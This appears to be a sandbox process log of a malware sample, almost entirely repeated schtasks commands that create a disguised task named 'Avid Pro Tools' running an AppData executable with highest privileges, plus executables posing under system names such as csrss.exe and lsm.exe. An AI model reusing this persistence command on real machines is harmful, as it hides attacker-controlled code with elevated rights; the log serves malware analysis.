"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\taskeng.exe

taskeng.exe {D124F85A-5B27-40EC-BBC6-8D99248552CE} S-1-5-21-2958949473-3205530200-1453100116-1000:WHMFPZKA\Admin:Interactive:[1]

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\winNet\wscript.exe

C:\winNet\wscript.exe

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\winNet\wscript.exe.exe

"C:\winNet\wscript.exe.exe"

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Users\Admin\AppData\Local\csrss.exe

"C:\Users\Admin\AppData\Local\csrss.exe"

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Users\All Users\Microsoft\IdentityCRL\audiodg.exe

"C:\Users\All Users\Microsoft\IdentityCRL\audiodg.exe"

C:\winNet\lsm.exe

C:\winNet\lsm.exe

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\winNet\lsm.exe.exe

"C:\winNet\lsm.exe.exe"

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Users\Admin\AppData\Local\csrss.exe

"C:\Users\Admin\AppData\Local\csrss.exe"

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

